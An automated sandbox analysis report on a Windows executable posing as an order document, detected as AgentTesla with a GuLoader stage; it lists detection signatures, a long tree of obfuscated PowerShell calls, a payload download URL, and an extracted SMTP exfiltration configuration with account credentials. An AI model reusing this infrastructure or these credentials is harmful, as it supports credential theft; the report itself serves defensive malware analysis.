Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe

Overview

General Information

Sample Name:Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
Analysis ID:716470
MD5:297cee2e9339ab19cb96a073ca8ba85f
SHA1:b5467307b8d1bc03ca9ed311b2ca06a9806d3b47
SHA256:9d0562b4cdc6c8a65119209d1f9dc4a06ce297afe2636b68a6772a470b0301a2
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Mass process execution to delay analysis
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Executable has a suspicious name (potential lure to open the executable)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Too many similar processes found
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe (PID: 408 cmdline: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe MD5: 297CEE2E9339AB19CB96A073CA8BA85F)
    • powershell.exe (PID: 1220 cmdline: powershell.exe 0x6B6570CB -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 2716 cmdline: powershell.exe 0x656C3197 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 6380 cmdline: powershell.exe 0x3A3A41D7 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 5412 cmdline: powershell.exe 0x656176C0 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 1120 cmdline: powershell.exe 0x46696EC0 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 1584 cmdline: powershell.exe 0x41286F85 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 3312 cmdline: powershell.exe 0x72342289 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 6856 cmdline: powershell.exe 0x20692295 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 5524 cmdline: powershell.exe 0x78383295 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 2524 cmdline: powershell.exe 0x30303295 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 6588 cmdline: powershell.exe 0x302C22CC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 2920 cmdline: powershell.exe 0x20302E85 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 1220 cmdline: powershell.exe 0x70203289 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 8080 cmdline: powershell.exe 0x20692291 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 1584 cmdline: powershell.exe 0x2C206B85 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 5956 cmdline: powershell.exe 0x30783A95 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 4492 cmdline: powershell.exe 0x2C206B85 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 7228 cmdline: powershell.exe 0x30296B8B -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 6136 cmdline: powershell.exe 0x723322FC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 6332 cmdline: powershell.exe 0x6B6570CB -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 6496 cmdline: powershell.exe 0x656C3197 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 5668 cmdline: powershell.exe 0x3A3A54CC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 7840 cmdline: powershell.exe 0x727477C4 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 5796 cmdline: powershell.exe 0x6C416EC9 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 6124 cmdline: powershell.exe 0x6F632ACC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 5736 cmdline: powershell.exe 0x302C6B85 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 6824 cmdline: powershell.exe 0x30783395 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 3160 cmdline: powershell.exe 0x30303295 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 6820 cmdline: powershell.exe 0x2C206B85 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 3540 cmdline: powershell.exe 0x30783195 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 2956 cmdline: powershell.exe 0x30302E85 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 1812 cmdline: powershell.exe 0x692032DD -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 1224 cmdline: powershell.exe 0x34302BD5 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 4976 cmdline: powershell.exe 0x2E7233FC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 4456 cmdline: powershell.exe 0x6B6570CB -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 5760 cmdline: powershell.exe 0x656C3197 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 2368 cmdline: powershell.exe 0x3A3A51C0 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 3536 cmdline: powershell.exe 0x74466BC9 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 6344 cmdline: powershell.exe 0x65506DCC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 4488 cmdline: powershell.exe 0x6E7467D7 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 7620 cmdline: powershell.exe 0x28697096 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 6852 cmdline: powershell.exe 0x2C206B85 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 3468 cmdline: powershell.exe 0x31343091 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 7588 cmdline: powershell.exe 0x202C22CC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 7632 cmdline: powershell.exe 0x20302ECC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 5272 cmdline: powershell.exe 0x20302BCC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 7464 cmdline: powershell.exe 0x2E7230FC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 180 cmdline: powershell.exe 0x6B6570CB -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 5772 cmdline: powershell.exe 0x656C3197 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 6668 cmdline: powershell.exe 0x3A3A50C0 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 1628 cmdline: powershell.exe 0x616444CC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 2360 cmdline: powershell.exe 0x6C652ACC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 7056 cmdline: powershell.exe 0x72332E85 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 7736 cmdline: powershell.exe 0x69207094 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 7884 cmdline: powershell.exe 0x2C206B85 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 1956 cmdline: powershell.exe 0x30783395 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 7660 cmdline: powershell.exe 0x30303295 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 4764 cmdline: powershell.exe 0x2C2A6B85 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 6344 cmdline: powershell.exe 0x302C22CC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 5696 cmdline: powershell.exe 0x20302BCC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 6200 cmdline: powershell.exe 0x2E7230FC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 1308 cmdline: powershell.exe 0x757367D7 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 7184 cmdline: powershell.exe 0x3332389F -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 6900 cmdline: powershell.exe 0x43616EC9 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 6380 cmdline: powershell.exe 0x57696CC1 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 4760 cmdline: powershell.exe 0x6F7752D7 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 6828 cmdline: powershell.exe 0x6F63438D -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 1708 cmdline: powershell.exe 0x69723385 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 7372 cmdline: powershell.exe 0x2C692295 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 1260 cmdline: powershell.exe 0x2C692295 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 7464 cmdline: powershell.exe 0x2C206B85 -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 936 cmdline: powershell.exe 0x302C22CC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 192 cmdline: powershell.exe 0x20302BFC -bxor 677 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • CasPol.exe (PID: 6756 cmdline: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 1660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
{"Exfil Mode": "SMTP", "SMTP Info": "slimshady@jubana.came*lVd67s:Mj_smtp.jubana.camslimshadyrrr@jubana.cam"}
SourceRuleDescriptionAuthorStrings
00000097.00000000.63070891541.0000000000F00000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000097.00000002.67444580363.000000001D574000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 5 entries
            No Sigma rule has matched
            Timestamp:192.168.11.20208.91.199.224498425872840032 10/05/22-09:37:55.889187
            SID:2840032
            Source Port:49842
            Destination Port:587
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.11.20208.91.199.224498425872851779 10/05/22-09:37:55.889187
            SID:2851779
            Source Port:49842
            Destination Port:587
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.11.20208.91.199.224498425872030171 10/05/22-09:37:55.889092
            SID:2030171
            Source Port:49842
            Destination Port:587
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.11.20208.91.199.224498425872839723 10/05/22-09:37:55.889092
            SID:2839723
            Source Port:49842
            Destination Port:587
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeReversingLabs: Detection: 73%
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeVirustotal: Detection: 62%Perma Link
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeMetadefender: Detection: 33%Perma Link
            Source: http://103.156.93.29/GpqoIwsbfqqIcl84.xtpAvira URL Cloud: Label: malware
            Source: http://103.156.93.29/GpqoIwsbfqqIcl84.xtpHVsAvira URL Cloud: Label: malware
            Source: http://smtp.jubana.camAvira URL Cloud: Label: malware
            Source: smtp.jubana.camVirustotal: Detection: 11%Perma Link
            Source: conhost.exe.7940.44.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "slimshady@jubana.came*lVd67s:Mj_smtp.jubana.camslimshadyrrr@jubana.cam"}
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_00406375 FindFirstFileW,FindClose,1_2_00406375
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_00405823 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405823
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_004027FB FindFirstFileW,1_2_004027FB

            Networking

            barindex
            Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.11.20:49842 -> 208.91.199.224:587
